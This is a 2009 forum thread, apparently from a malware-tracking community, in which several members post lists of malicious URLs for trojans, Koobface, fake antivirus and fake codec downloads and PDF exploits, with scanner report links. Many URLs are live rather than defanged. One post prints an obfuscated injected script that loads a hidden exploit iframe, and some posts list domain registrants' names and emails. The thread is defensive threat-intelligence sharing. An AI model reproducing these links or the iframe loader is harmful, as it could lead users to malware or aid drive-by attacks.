hxxp://lotultimatebet.cn/in.cgi?income
Title: Re: daily something......
Post by: sparsha on April 29, 2009, 05:10:57 pm
Code: [Select]
http://nhgfngfdhngf.com/fff9999.php?aid=40012&uid=e0905079d41d8cd98f00b204e9800998ecf8427e&os=512

http://imageempires.com/perce/1e20a980a5c00739dd84315d884c4d49081fa0501bd2a074be995820802939a85eec2ff8a432377ec/64d050a1229/perce.jpg
http://sphericalart.com/item/be3049005510b7d9dd4431fdd86c2d79b80fa0a0bbd2e034ae4908f0f02989a86eccafc8e45297bea/c4a07021c2e/item.gif
http://imagesmonitor.com/werber/e4d08081926/216.jpg
http://em.pc-on-internet.com/eas?camp=22768&ty=ct&popt1=1220&popt2=DE
http://download.web-mediaplayer.com/Web-MediaPlayer_setup.php?grpid=2053&tag_id=717&nums=FFjwag.AAA&popt1=1220&popt2=DE

Rogues

Code: [Select]
http://pcantimalware.com/PCAntiMalwareScannerSetup.exe
http://pc-privacydefender.com/PCPrivacyDefenderScannerSetup.exe

http://totalsystemguard.com/page.php?id=44
http://totalvirushield.com/download.php?affid=00000
http://totalvirushield.com/install/ws.zip

http://pro-scanner-antivir-free.com/11041/3/
http://files.loads-antiviral-files.com/normal/setup_11041_3_1.exe


Fake codecs

Code: [Select]
http://kokc-softportal.com/softwarefortubeview.40006.exe
http://uploadsmovies.com/codec/106.exe
Title: Re: daily something......
Post by: CkreM on April 30, 2009, 03:47:13 am
Trojan:
Code: [Select]
secure123.org/img/winagent.exehttp://www.virustotal.com/analisis/cae7efe27fcd81c66f8e050b937de712
Trojan:
Code: [Select]
neirrela92-ammi.cn/it021.exehttp://www.virustotal.com/analisis/4cd315b8b8cbcd96802332a6ba59d90d
Trojan:
Code: [Select]
fddporn.net/6007_1.exehttp://www.virustotal.com/analisis/e2cdbb3586041e93705d5e88a3d72d42
fake AV:
Code: [Select]
fddporn.com/av.26.0.exehttp://www.virustotal.com/analisis/7f7dccb45937295dd11c73a989330b61
the fake AV website:
Code: [Select]
antiwareprotect.comthe fake payment site:
Code: [Select]
https://secure.paysecureorder.com/order?agree=on&prodid=2&r=1.0&butt=
Exploit/trojan:
Code: [Select]
karavan.us/bon/index.phphttp://wepawet.cs.ucsb.edu/view.php?hash=6b8c81232ad4b6589475d706c22a061a&t=1241050191&type=js
Exploit/trojan:
Code: [Select]
karavan.us/sng/cache/readme.pdfhttp://wepawet.cs.ucsb.edu/view.php?hash=3738291a02aadc69a7c9ed9e692d9b67&t=1241050218&type=js
Title: Re: daily something......
Post by: XiTri on April 30, 2009, 10:19:43 am
Code: [Select]
http://neono.biz/opi/index.php
http://neono.biz/opi/cache/readme.pdf
http://neono.biz/opi/cache/flash.swf
http://neono.biz/opi/load.php
http://neono.biz/myy/load.php
Title: Re: daily something......
Post by: sriramp on April 30, 2009, 01:33:46 pm
hxxp://egangoff.com/images/pdf.php
hxxp://egangoff.com/images/builder.php - Flash
Title: Re: daily something......
Post by: RS-232 on April 30, 2009, 04:18:00 pm
Quote
hxxp://liora.co.za/images/
http://wepawet.cs.ucsb.edu/view.php?hash=6751dee94cb3088705b66504d435a934&t=1241108619&type=js
http://www.virustotal.com/analisis/506618b146220329eb6ac64c552d0aed
Title: Re: daily something......
Post by: sparsha on April 30, 2009, 04:54:15 pm
Code: [Select]

bitcoreguard.net
bitcoreguard.com
guardlab.com
guardav.com
coreguard2009.com
coreguard2009.biz
coreguard2009.net
coreguardlab2009.biz
coreguardlab2009.net
coreguardlab2009.com
guardlab2009.biz
guardlab2009.net
guardlab2009.com

http://coreguard2009.com/coreguardd.exe
http://guardlab2009.com/InstallerWF.exe


Another interesting site from this gang??
Code: [Select]
just4yourtranquillity.com
Title: Re: daily something......
Post by: RS-232 on April 30, 2009, 05:31:59 pm
Quote
hxxp://bigbargin.cn/file1.exe
And that's what happens to lamers still using MicroJoiner in 2009...  ;D
http://www.virustotal.com/analisis/2977518dd680ba0acde393f6e9d58a10

From a well-known net neighbourhood...
Quote
hxxp://downfilg.com/in.cgi?2&a=1.exe  // where "1" can be substituted with whatever string you want...
hxxp://keygroundc.com/download/1%2Eexe
http://www.virustotal.com/analisis/00f4e6ad59857e5d9a0920052317a471
Title: Re: daily something......
Post by: sparsha on April 30, 2009, 06:37:56 pm
Little bit of this and a little bit of that

Code: [Select]
http://fast-scanner-av-pro.com/11041/3/

http://thefullvirusscan.com/download.php?affid=08073

http://kekc-softportal.com/softwarefortubeview.40012.exe

http://upd.pccleansolution.com/?proto=4&rc=UAMS-0001-8882-7773&v=99.3.3.1&abbr=WBASE&platform=nt&os_version=5.1.2600.2.0&ac=B10511E3-DB89-4D8F-9666-5A0BA1ED885F&appid=UAMS&em=&pcid=2561334094&sv=

ReturnCode: 0
Text:
ProductVersion: 99.3.3.351
File:MalwareDB3510.exe,3871295,684586667,http://dl.setforinfo.com/updates/83/153/MalwareDB3510.exe
File:vbpv.dat,10,-830365698,http://dl.setforinfo.com/updates/83/153/vbpv.dat
File:update.script,143,-1272521259,http://scripts.setforinfo.com/update_script.php?ids=285_287

Title: Re: daily something......
Post by: RS-232 on April 30, 2009, 07:10:56 pm
Quote
hxxp://prodownloadmanager.com/install.php
Title: Re: daily something......
Post by: RS-232 on April 30, 2009, 08:20:15 pm
http://www.bfk.de/bfk_dnslogger.html?query=195.2.253.41#result

traff.loadmore.eu is already in list...

traff.loadd.in is Virut-related:
http://www.threatexpert.com/report.aspx?md5=4586242be6d360f577725e1487c2d7cf
http://www.prevx.com/filenames/1076913952874868034-X1/KEYGEN_SPYHUNTER.SECURITY.SUITE.V3.7.19%5B.html

And regarding the other 2 domains there...

Quote
hxxp://fineles.yourfoxlink.net/download/1.exe // ...very well-detected,you can change "1" to whatever string you want...
http://www.virustotal.com/analisis/9739b2f5e6adee880d9b86687d2c7ba1
Result: 34/40 (85%)

Quote
hxxp://yourfoxlink.net/files/1.exe // ...you can change "1" to whatever string you want...
hxxp://www.virustotal.com/analisis/d113e8d8aae448d9ebe320b7f9c15696
Result:10/40 (25%)
Title: Re: daily something......
Post by: CkreM on April 30, 2009, 11:14:55 pm
Trojans:
Code: [Select]
gertruweq.com/ee/gld.exehttp://www.virustotal.com/analisis/92dbc2bad00080a577cb17ecb7cfd7b2
Code: [Select]
gertruweq.com/ee/ret.exehttp://www.virustotal.com/analisis/9a8654be39f40883c05c6b44708596cd
Code: [Select]
gertruweq.com/ee/9.exehttp://www.virustotal.com/analisis/f3fc6085f437fb11591a79c2c1331e43
Title: Re: daily something......
Post by: CkreM on May 01, 2009, 06:12:52 am
Exploit/trojan:
Code: [Select]
adul8tra.cn/forum/foxpdf.phphttp://wepawet.iseclab.org/view.php?hash=fbc7708cc988b8a5709796f83197a905&t=1241158354&type=js
Code: [Select]
k1l3r.ru/Y/include/spl.phphttp://wepawet.iseclab.org/view.php?hash=b673dbc9d832f66c67af103cb1dbf9e8&t=1240825850&type=js
Title: Re: daily something......
Post by: Malware-Web-Threats on May 02, 2009, 12:06:50 am
Code: [Select]
hxxp://basesrv3.net/yes/load.phpVirusTotal: Trojan (http://www.virustotal.com/analisis/cba60d1c2b108f1e03a46518980a142d) - 21/38 (55.26%)

Code: [Select]
hxxp://ldj5.biz/fo/exe.phpVirusTotal: Trojan (http://www.virustotal.com/analisis/92b9ba7ab8d03b9f838879df541a8536) - 11/40 (27.50%)
------------
Code: [Select]
hxxp://pushtutempo.com/uniq3/loads.php?id=88VirusTotal: Trojan (http://www.virustotal.com/analisis/7c4dfa5c1e6c4f4c30a76d1f511416d6) - 4/40 (10%)
ThreatExpert (http://www.threatexpert.com/report.aspx?md5=8fc9779acb3553505810fd40629b4695)
Anubis Report (http://anubis.iseclab.org/?action=result&task_id=1c4b733144334c6c411a26821be3fc633)

connect to:
Code: [Select]
hxxp://verringo.cn/bmngr2/controller.php?action=bot&entity_list=&uid=&first=1&guid=13441600&rnd=3862340
hxxp://verringo.cn/bmngr2/controller.php?action=report&guid=0&rnd=3862340&uid=&entity=1239797538:unique_start
Title: Re: daily something......
Post by: SysAdMini on May 02, 2009, 10:36:43 am
Code: [Select]
dolchepopka.ru/ol/in.phphttp://wepawet.cs.ucsb.edu/view.php?hash=c5e81e17c05c73c50ffd675d7932f33d&t=1241260417&type=js

Code: [Select]
http://dolchepopka.ru/1/load.php?id=6http://www.virustotal.com/de/analisis/b788baee70eaf595b2e8fc726484f8cf 10/40

Code: [Select]
http://dolchepopka.ru/ol/load.php?id=3http://www.virustotal.com/de/analisis/f95123d5cf3281012c6cc0766b381db1 4/40
Title: Re: daily something......
Post by: Malware-Web-Threats on May 02, 2009, 10:50:16 am
redirects to exploits:
Code: [Select]
hxxp://tds4self.com/sutra/in.cgi?3Wepawet (http://wepawet.iseclab.org/view.php?hash=8d08793a7fce9b0edc095c038b00967f&t=1241256659&type=js)

exploits:
Code: [Select]
hxxp://webcom-software.net/links/?
hxxp://monkey-squad.net/monkey/index.php
hxxp://monkey-squad.net/monkey/spl/pdf.pdf
hxxp://bronotak.cn/phpmyadmin/index.php?
hxxp://qwu11a.biz/cpanel/spl/pdf.pdf
Wepawet (http://wepawet.iseclab.org/view.php?hash=1458d4c43388d9b059dadc0c86416d39&t=1241256889&type=js)
Wepawet (http://wepawet.iseclab.org/view.php?hash=40c522b5d94eefbd36ef5a027cfe3509&t=1241256556&type=js)
Wepawet (http://wepawet.iseclab.org/view.php?hash=ccb26870cf566e7f980ee4a46fc441b8&t=1241256743&type=js)
Wepawet (http://wepawet.iseclab.org/view.php?hash=6a89a05b812e9f981f08e25a21329dca&t=1241261515&type=js)
Wepawet (http://wepawet.cs.ucsb.edu/view.php?type=js&hash=5a88a5c5fc9f1aa0ca88fbd1beeeba9f&t=1241250527)

trojan:
Code: [Select]
hxxp://monkey-squad.net/monkey/exe.php
hxxp://qwu11a.biz/cpanel/exe.php
VirusTotal (http://www.virustotal.com/analisis/d6d3c79457cce29c2ef3ac44822e59eb) - 27/40 (67.5%)
VirusTotal (http://www.virustotal.com/analisis/d3fb0f65eafb1142d7d22355914dd011) - 11/40 (27.5%)
Title: Re: daily something......
Post by: CkreM on May 03, 2009, 11:52:03 am
Exploit/trojan:
Code: [Select]
carpena.co.uk/cmweb/print/pdf.phphttp://wepawet.iseclab.org/view.php?hash=7e78a387e1c5eac47bd34922f4cef85f&t=1241336475&type=js

Koobface:(goes on and off all the time)
Code: [Select]
86.108.36.203/setup.exe
99.50.245.81/setup.exe
http://www.virustotal.com/analisis/bd22d575927bfbf1103713d8718c3a90

Redirects to exploits:
Code: [Select]
freak-vkontakte.bizcontain iframe to
Code: [Select]
http://basesrv3.net/bin/in.php which is on MDL
wepawet gives Invalid hostname on this domain.
http://jsunpack.jeek.org/dec/go?url=freak-vkontakte.biz
Title: Re: daily something......
Post by: CkreM on May 03, 2009, 03:21:16 pm
koobface:
Code: [Select]
99.149.173.147/setup.exehttp://www.virustotal.com/analisis/600848442c7fed4e8727fc0bc4ee4963

Fake AV:
Code: [Select]
way4scan.info
Title: Re: daily something......
Post by: CkreM on May 04, 2009, 06:53:02 am
Fake AV:
Code: [Select]
truepornmovies.com/scan/?id=259
truepornupload.com/codec.exe
http://www.virustotal.com/analisis/cf4edf2f5335aeb331a25c1267bfd36f

Koobface:
Code: [Select]
75.10.117.174/setup.exehttp://www.virustotal.com/analisis/a2b8e6c4944251f9fc6cf88c36865dd7
Trojan:
Code: [Select]
wc-zone.biz/root.exehttp://www.virustotal.com/analisis/6272b4bfc597e3de994ab200a91c0d44
Trojan:
Code: [Select]
lesbian-girlhard.com/ftp.exehttp://www.virustotal.com/analisis/4d51d8169ba9ad5d74189913c2f89c4b
Trojan Pinch:
Code: [Select]
siski-piski.biz/tarif/pin.exehttp://www.virustotal.com/analisis/ebf13bc733aff1068de51d379f3760da
Trojan:
Code: [Select]
fp3s.biz/6007.exehttp://www.virustotal.com/analisis/56081b98a809bdde7394834e262053cf
Trojan:
Code: [Select]
antivirus.vc/pictures/forum/ftp1.exehttp://www.virustotal.com/analisis/cc07134acd95c61cda816efb94778537
Title: Re: daily something......
Post by: SysAdMini on May 04, 2009, 02:54:35 pm
Code: [Select]
http://cutheatergroup.cn/fl/index.php
http://wepawet.iseclab.org/view.php?hash=3c532cd0cfca29264a4000f6e9476f16&t=1241447080&type=js

Code: [Select]
http://cutheatergroup.cn/fl/cache/readme.pdfhttp://wepawet.iseclab.org/view.php?hash=8078638d68a0675fe56b6e14ebf5425a&t=1241447310&type=js

Code: [Select]
http://cutheatergroup.cn/fl/load.php?id=4
http://cutheatergroup.cn/fl/load.php?id=5
http://www.virustotal.com/analisis/a61bd8c9f1542069d75889f4f9040adc 8/39
Title: Re: daily something......
Post by: Malware-Web-Threats on May 04, 2009, 04:49:07 pm
Redirects to fake codec page
Code: [Select]
hxxp://rhianna.name/vidd/Wepawet (http://wepawet.iseclab.org/view.php?hash=9bc249ed3be0d9f451ab3a96d0dd4ba4&t=1241454697&type=js)
Fake codec page
Code: [Select]
hxxp://tubecollection2009.com/xxplay.php?id=40009
Trojan:
Code: [Select]
hxxp://kvm-softwares.com/softwarefortubeview.40009.exeVirusTotal (http://www.virustotal.com/analisis/b6082ec0b0c912976887d0549ed5a315) - 10/40 (25%)
Anubis (http://anubis.iseclab.org/?action=result&task_id=1f91f09153120c524a56fa4930c32dbe3)
ThreatExpert (http://www.threatexpert.com/report.aspx?md5=b179b7959a87bd316d7f7f11a993e037)

downloads:
Code: [Select]
hxxp://imageempires.com/perce/064c5b7bbc854008e18e97e54448fea26776e621b10f2f35f025196defd65efd23a07ce83fb8ef114/80f/perce.jpg
hxxp://picturesoffline.com/item/86ccfb2b2c651048211e775514986e728746d681618fff45b0b539ddffb6de8d73c0aca83fc8ef51e/50a/item.gif
hxxp://pictureswall.com/werber/109/216.jpg
VirusTotal (http://www.virustotal.com/analisis/5455beb9e4d430a802947aff82a28c45) - 28/40 (70%)
Anubis (http://anubis.iseclab.org/?action=result&task_id=129c01269a6adfa745da5c44dbefb2560)
ThreatExpert (http://www.threatexpert.com/report.aspx?md5=e49048a38d0757b92a34dff6fc3b3f74)

VirusTotal (http://www.virustotal.com/analisis/7ff08733247ab68a16cba8621f5b403b) - 22/40 (55%)
Anubis (http://anubis.iseclab.org/?action=result&task_id=11ad97792e7b27b543d32662c7752f36a)
ThreatExpert (http://www.threatexpert.com/report.aspx?md5=532bd3862d3500f65d3abada38c673c5)

VirusTotal (216.jpg - bb.jpg) (http://www.virustotal.com/analisis/6fd1a269e6d5fa4a25f3b057b57c3591) - 14/40 (35%)
Anubis (http://anubis.iseclab.org/?action=result&task_id=1e91fdd1c62e3db5469d63159691a8364)
ThreatExpert (http://www.threatexpert.com/report.aspx?md5=3b51dcb1768fd868c6a4c5a03299f807)

perce.jpg
HTTP Conversations:
Quote
216.240.157.91:80 - [imagesrepository.com]
POST /resolution.php
88.214.205.8:80 - [zone-searching.com]
POST /borders.php

item.gif
HTTP Conversations:
Quote
216.240.157.88:80 - [last-visit.com]
GET /cset.php?id=g/7bOKwqwd6bH3e9BvR2gC5DOC QMjuEVJXCr1HPwBvUhUpfkUo9FCofikcbokMC3jvn7vnlOfsSb ApC9D84VB4pDwQzKDIuNNR7WpvFBlUMPZcyrW3O9vf9lli2EaM wb5lhGwWRkdZIg74dRBmaah/YZsBERxLkPueyDpqK/ml4U4Vlw 96siO09AkAzfqTK81K4Kpw4ntiIe0J7ZDQvPKOlWVMEo9vNlcI..
GET /uget.php?id=g/7bOKwqwd6bH3e9BvR2gC5DOC QMjuEVJXCr1HPwBvUhUpfkUo9FCofikcbokMC3jvn7vnlOfsSb ApC9D84VB4pDwQzKDIuNNR7WpvFBlUMPZcyrW3O9vf9lli2EaM wb5lhGwWRkdZIg74dRBmaah/YZsBERxLkPueyDpqK/ml4U4Vlw 96siO09AkAzfqTK81K4Kpw4ntiIe0J7ZDQvPKOlWVMEo9vNlcI..
Title: Re: daily something......
Post by: SysAdMini on May 04, 2009, 05:13:31 pm
Trojan:
Code: [Select]
hxxp://kvm-softwares.com/softwarefortubeview.40009.exeVirusTotal (http://www.virustotal.com/analisis/b6082ec0b0c912976887d0549ed5a315) - 10/40 (25%)
Anubis (http://anubis.iseclab.org/?action=result&task_id=1f91f09153120c524a56fa4930c32dbe3)
ThreatExpert (http://www.threatexpert.com/report.aspx?md5=b179b7959a87bd316d7f7f11a993e037)

see also:

xxx-softwares.com
cool-softtech.com
rtfm-softweares.com
xyu-softportal.com
xepace-software.com
ce-softwares.com
dig-softportals.com
pac-softportal.com
Title: Re: daily something......
Post by: Malware-Web-Threats on May 04, 2009, 05:56:07 pm
This IP host similar websites with same payload: http://www.robtex.com/ip/195.88.80.41.html (http://www.robtex.com/ip/195.88.80.41.html)

can be download using "/softwarefortubeview.40007.exe" - "/softwarefortubeview.40008.exe" etc..

Code: [Select]
hxxp://xxx-softwares.com/softwarefortubeview.40009.exe
hxxp://cool-softtech.com/softwarefortubeview.40009.exe
hxxp://rtfm-softweares.com/softwarefortubeview.40009.exe
hxxp://xyu-softportal.com/softwarefortubeview.40009.exe
hxxp://xepace-software.com/softwarefortubeview.40009.exe
hxxp://ce-softwares.com/softwarefortubeview.40009.exe
hxxp://dig-softportals.com/softwarefortubeview.40009.exe
hxxp://pac-softportal.com/softwarefortubeview.40009.exe

Quote
File size: 65536 bytes
MD5...: b179b7959a87bd316d7f7f11a993e037

VirusTotal (http://www.virustotal.com/analisis/8f2b9ad6c0782cc4f50921d16061056a)

Title: Re: daily something......
Post by: Malware-Web-Threats on May 04, 2009, 06:08:54 pm
Also have the same structure with "promo.exe"

Code: [Select]
hxxp://xxx-softwares.com/promo.exe
hxxp://cool-softtech.com/promo.exe
hxxp://rtfm-softweares.com/promo.exe
hxxp://xyu-softportal.com/promo.exe
hxxp://xepace-software.com/promo.exe
hxxp://ce-softwares.com/promo.exe
hxxp://dig-softportals.com/promo.exe
hxxp://pac-softportal.com/promo.exe

Quote
File size: 74752 bytes
MD5: 951f3ee90eb3576325fa1920e3da678c

VirusTotal (http://www.virustotal.com/analisis/4551c0b455166626a3034c22888a856d) - 29/39 (74.36%)
Anubis (http://anubis.iseclab.org/?action=result&task_id=101a845c61bdcac74392ebc2f97208986&call=first)
ThreatExpert (http://www.threatexpert.com/report.aspx?md5=5863553963378030c5223e76bca37da1)

HTTP Conversations:
Quote
216.240.148.9:80 - dfdsfdsfcdsc.com
Request: GET /bbb.php
Request: GET /ccc_2.php?uid=6cbbc5081e7548e276611ff5059df6ed30c8f8f1&aid=&os=513
Title: Re: daily something......
Post by: Malware-Web-Threats on May 05, 2009, 01:29:03 am
related: teyrebuf[.]cn, gukgifoc[.]cn, beelposttraning[.]ru, dastrealworld[.]ru

redirects to exploits:
Code: [Select]
hxxp://dastrealworld.ru/denunreal.html
Wepawet (http://wepawet.iseclab.org/view.php?hash=10fc58eeacba6fa759b1305d1d30610d&t=1241486137&type=js)

the script that came with this one
Quote
<script>
document.write(unescape("%3c%73%74%79%6c%65%20%74%79%70%65%3d%22%74%65%78%74%2f%63%73%73%22%3e%20%69%66%72%61%6d%65%20%7b%77%69%64%74%68%3a%30%3b%68%65%69%67%68%74%3a%30%3b%62%6f%72%64%65%72%3a%30%3b%7d%20%3c%2f%73%74%79%6c%65%3e"));
</script>
<script>
eval(unescape("%76%61%72%20%62%32%34%20%3d%20%53%74%72%69%6e%67%2e%66%72%6f%6d%43%68%61%72%43%6f%64%65%28%31%30%34%2c%31%31%36%2c%31%31%36%2c%31%31%32%2c%35%38%2c%34%37%2c%34%37%2c%31%30%30%2c%39%37%2c%31%31%35%2c%31%31%36%2c%31%31%34%2c%31%30%31%2c%39%37%2c%31%30%38%2c%31%31%39%2c%31%31%31%2c%31%31%34%2c%31%30%38%2c%31%30%30%2c%34%36%2c%31%31%34%2c%31%31%37%2c%34%37%2c%31%30%30%2c%31%30%31%2c%31%31%30%2c%31%31%37%2c%31%31%30%2c%31%31%34%2c%31%30%31%2c%39%37%2c%31%30%38%2c%34%36%2c%31%30%34%2c%31%31%36%2c%31%30%39%2c%31%30%38%29%3b%64%6f%63%75%6d%65%6e%74%2e%77%72%69%74%65%28%75%6e%65%73%63%61%70%65%28%27%3c%69%66%72%61%6d%65%20%73%72%63%3d%5c%27%27%2b%62%32%34%2b%27%5c%27%3e%3c%2f%69%66%72%61%6d%65%3e%27%29%29%3b"));
</script>

the iframe:
Quote
<style type="text/css"> iframe {width:0;height:0;border:0;} </style>

var b24 = String.fromCharCode(104,116,116,112,58,47,47,100,97,115,116,114,101,97,108,119,111,114,108,100,46,114,117,47,100,101,110,117,110,114,101,97,108,46,104,116,109,108);document.write(unescape('<iframe src=\''+b24+'\'></iframe>'));

Found here:
http://wepawet.iseclab.org/view.php?hash=0495bd4385abfecfa1b5085b9027777d&t=1241485592&type=js (http://wepawet.iseclab.org/view.php?hash=0495bd4385abfecfa1b5085b9027777d&t=1241485592&type=js)

other on the same site

Code: [Select]
hxxp://dastrealworld.ru/underworld.html
hxxp://dastrealworld.ru/cover.html
Wepawet (http://wepawet.iseclab.org/view.php?hash=13648af19411e61a80007ca84c1b2ab5&t=1241486057&type=js)
Wepawet (http://wepawet.iseclab.org/view.php?hash=3caa65b128918f67b6d2d28b2d8e36b4&t=1241486229&type=js)

pdf exploits:
Code: [Select]
hxxp://gukgifoc.cn/nuc/spl/pdf.pdf
Wepawet (http://wepawet.iseclab.org/view.php?hash=60f130f89de4dc9c4bc40334423ce7d8&t=1241079304&type=js)
Title: Re: daily something......
Post by: RS-232 on May 05, 2009, 10:00:25 am
Quote
hxxp://totalweightlosscenter.com/images/go.php?sid=1
hxxp://nikolaevere.com/images/data/load.php
- - - - - - - - - - -
Pharmacy crap:
http://www.robtex.com/ip/203.117.111.123.html
- - - - - - - - - - -
Hadn't seen this lame trick in quite some time...
Quote
hxxp://www.mediapartner.by.ru/bunners/banunicom.gif
http://www.virustotal.com/analisis/228b180b2318b8477201eea15d09a0bb
Result: 7/40 (17.5%)
- - - - - - - - - - -
Quote
hxxp://update.dom11z.cn/cache/readme.pdf
http://www.virustotal.com/analisis/54bcdbcb1f52dc418c5af7fd965eb75e

Interesting ip...lots of domains them seem to redirect to update.dom11z.cn above,one way or another:
http://www.bfk.de/bfk_dnslogger.html?query=213.182.197.230#result
Title: Re: daily something......
Post by: RS-232 on May 05, 2009, 01:55:10 pm
From the 213.182.197.2xx neighbourhood again...

Quote
hxxp://hostyapics.com/video/988/install_flash_player.exe
http://www.virustotal.com/analisis/72fa934c6d4d76a80a2d714d3586cc8b
Result: 4/40 (10%)
http://anubis.iseclab.org/?action=result&task_id=170666b5c144e68b4b9008d22642304c4&format=html
---->
hxxp://members.chello.pl/i.lemecha/index1.gif
http://www.virustotal.com/analisis/a9bb65e395a3f6a43ef8bec2790d9697
Result: 4/39 (10.26%)
http://anubis.iseclab.org/?action=result&task_id=1451aadd8279355c469500473ed1e00b3&format=html
--->
(Anubis results in short...i've commented only the ones that have a somewhat lousy detection rate):
hxxp://adimsceibh.com/progs/eqkxyll/cziwjnoo.php?adv=adv557
hxxp://adimsceibh.com/progs/eqkxyll/vblymjwx.php
hxxp://adimsceibh.com/progs/eqkxyll/bueesf.php
hxxp://adimsceibh.com/progs/eqkxyll/rtqrrfss.php
hxxp://adimsceibh.com/progs/eqkxyll/fczzm.php
hxxp://adimsceibh.com/progs/eqkxyll/hrnbopcqde.php
hxxp://adimsceibh.com/progs/eqkxyll/yvscpd.php // Result: 4/40 (10%) - Pinch
hxxp://adimsceibh.com/progs/eqkxyll/gqrrfft // Result: 9/41 (21.96%) - Vundo
Title: Re: daily something......
Post by: CkreM on May 06, 2009, 07:01:34 am
PDF exploits(all the same, on IP - 91.212.41.119):
Code: [Select]
nicdaheb.cn/nuc/spl/pdf.pdfhttp://wepawet.iseclab.org/view.php?hash=d0151c3192d10713487fff545fab19ff&t=1241590847&type=js
Code: [Select]
sehmadac.cn/nuc/spl/pdf.pdfhttp://wepawet.iseclab.org/view.php?hash=e0ee4d85cd32c9d38378686a65413636&t=1241591188&type=js
Code: [Select]
vavgurac.cn/nuc/spl/pdf.pdfhttp://wepawet.iseclab.org/view.php?hash=de5856cb0d29edcbf0151722249c73f8&t=1241591259&type=js
Code: [Select]
tixleloc.cn/nuc/spl/pdf.pdfhttp://wepawet.iseclab.org/view.php?hash=614e78b7f2bf16d7fc76ebfd876e57d5&t=1241591442&type=js
Code: [Select]
teyrebuf.cn/nuc/spl/pdf.pdfhttp://wepawet.iseclab.org/view.php?hash=371a870529fc3101c03eeee07e93124c&t=1241591523&type=js
Code: [Select]
tukhemaj.cn/nuc/spl/pdf.pdfhttp://wepawet.iseclab.org/view.php?hash=251584c0c643dcfe6ba8ec2842547b76&t=1241591544&type=js
Code: [Select]
tixwagoq.cn/nuc/spl/pdf.pdfhttp://wepawet.iseclab.org/view.php?hash=aee55ad675950b610765dc60a7772a9d&t=1241591577&type=js

all lead to this trojan:
Code: [Select]
nicdaheb.cn/nuc/exe.phphttp://www.virustotal.com/analisis/3b2a31a93f84f0b540f14abbe54a89e0

Rogue:
Code: [Select]
antivguardian.com
antiawarepro.com
antivirprof.com

Fake AV:
Code: [Select]
stats.swpstats.com/getfile?id=26http://www.virustotal.com/analisis/ed4436020c7fe8208e13d0b19cda10db

Fake AV:
Code: [Select]
free-webscaners.com/scan
Koobface:
Code: [Select]
64.4.224.45/setup.exe
69.154.143.170/setup.exe
75.54.183.125/setup.exe
62.98.53.173/setup.exe
74.216.59.250/setup.exe
http://www.virustotal.com/analisis/6914e7738d5af094ac7105a4aa087a60

Trojan:
Code: [Select]
http://down.yyduowan.net/2.exehttp://www.virustotal.com/analisis/b008ea75feb56250e0124be694180c2d
Trojan:
Code: [Select]
svarkon.ru/update.exehttp://www.virustotal.com/analisis/f8f886d3907495a15f08d982bbae11b2
Title: Re: daily something......
Post by: XiTri on May 06, 2009, 08:42:15 am
Code: [Select]
http://72.29.67.139/knb/megatrader-2k_20090505.exe

http://vilko.biz/opi/index.php
http://vilko.biz/opi/load.php
http://vilko.biz/opi/cache/readme.pdf

http://vilko.biz/myy/index.php
http://vilko.biz/myy/load.php
http://vilko.biz/myy/cache/readme.pdf
Title: Re: daily something......
Post by: CkreM on May 06, 2009, 09:35:28 pm
Exploit:(downloaded file on MDL)
Code: [Select]
liteautobestguide.cn/index.phphttp://wepawet.cs.ucsb.edu/view.php?hash=66fec491755fc72f675563dd6c4fc20a&t=1241645815&type=js

Also a trojan on that domain:
Code: [Select]
liteautobestguide.cn/load.phphttp://www.virustotal.com/analisis/bfbac430fbb0fb3096239b7c98d384ac

Koobface:
Code: [Select]
65.75.82.150/setup.exe
98.203.149.224/setup.exe
trojan:
Code: [Select]
qqcfwaigua.com/cfwg.exehttp://www.virustotal.com/analisis/7403d735e83451ef65863b15b832d9ae
Title: Re: daily something......
Post by: CkreM on May 07, 2009, 03:48:19 pm
Koobface:
Code: [Select]
70.105.181.119/setup.exe
98.228.135.203/setup.exe
129.119.193.233/setup.exe
http://www.virustotal.com/analisis/89e1b7e8bf4f2be5773a1000a8dd3817
Title: Re: daily something......
Post by: CkreM on May 11, 2009, 03:40:51 am
Koobface:
Code: [Select]
86.121.7.57/setup.exe
69.247.67.92/setup.exe
Trojan:
Code: [Select]
greatjobdealuk.info/isp/upload/socksbot.exe http://www.virustotal.com/analisis/ef89795fe5c6a42f855e37216328e0cb
Title: Re: daily something......
Post by: Malware-Web-Threats on May 11, 2009, 04:15:15 pm
216.240.143.7
Fake codec page:
Code: [Select]
hxxp://better-tube-show.com/xxplay.php?id=40009
Registrant: Bobby Macleod (bobbym806@ gmail.com)

216.240.148.9
Returns malware urls:
Code: [Select]
hxxp://hjtktyjyhhn.com/fff9999.php?aid=0&uid=00cd1a40d41d8cd98f00b204e9800998ecf8427e&os=512
Registrant: Jameson Jack (cyber38462@ hotmail.com)

Quote
hxxp://imageempires.com/perce/8020ac6db14a14e0ed94c17da86c8d0938cff0c02ba29014aee9a81000a9b998de6c0f98a422879eb/400/perce.jpg hxxp://picturesoffline.com/item/60b08c6de14a64b07d04519db83c3dc948ef80e0bbf2e054ae09d830c0194928cecc8fb814f2678e0/b01/item.gif
hxxp://pictureswall.com/werber/b0f/216.jpg
hxxp://sdfv-programs.com/file.exe
ThreatExpert (http://www.threatexpert.com/report.aspx?md5=f621255677a794be1390e48b47823fa0)

70.86.3.198 [c6.3.5646.static.theplanet.com]
Trojan Clicker:
Code: [Select]
hxxp://jump1.info/xxx.exe
hxxp://xxx.host800.com/xxx.exe
VirusTotal (http://www.virustotal.com/analisis/4abfb028c31a9979aaa09b9de52b7d5f) - 24/40 (60.00%)
Registrant: yong wang (edizhu@ hotmail.com)
Registrant: youguang wang (edisoho@ hotmail.com)

Trojan GameThief OnLineGames:
61.174.68.24
Code: [Select]
hxxp://www.361safae.cn/img/sri1.gif
hxxp://www.361safae.cn/img/sri2.gif
hxxp://www.361safae.cn/img/sri3.gif
hxxp://www.361safae.cn/img/sri4.gif
hxxp://www.361safae.cn/img/sri5.gif
hxxp://www.361safae.cn/img/sri6.gif
hxxp://www.361safae.cn/img/sri7.gif
hxxp://www.361safae.cn/img/sri8.gif
hxxp://www.361safae.cn/img/sri9.gif
Registrant: Xie Yang (ylaoda88@ 163.com)
VirusTotal (http://www.virustotal.com/analisis/e47da00f08d79ea42c45d7f01ed88291)
VirusTotal (http://www.virustotal.com/analisis/bb63e441554489f062be7dbdb5ee5fc0)
VirusTotal (http://www.virustotal.com/analisis/542d74d0849cea1a0aa0d673d9fddbf3)
VirusTotal (http://www.virustotal.com/analisis/f3d8ce321d53b6004d629c5e976790c0)
VirusTotal (http://www.virustotal.com/analisis/9b8a676e815e3feb25b0fe89c1220c72)
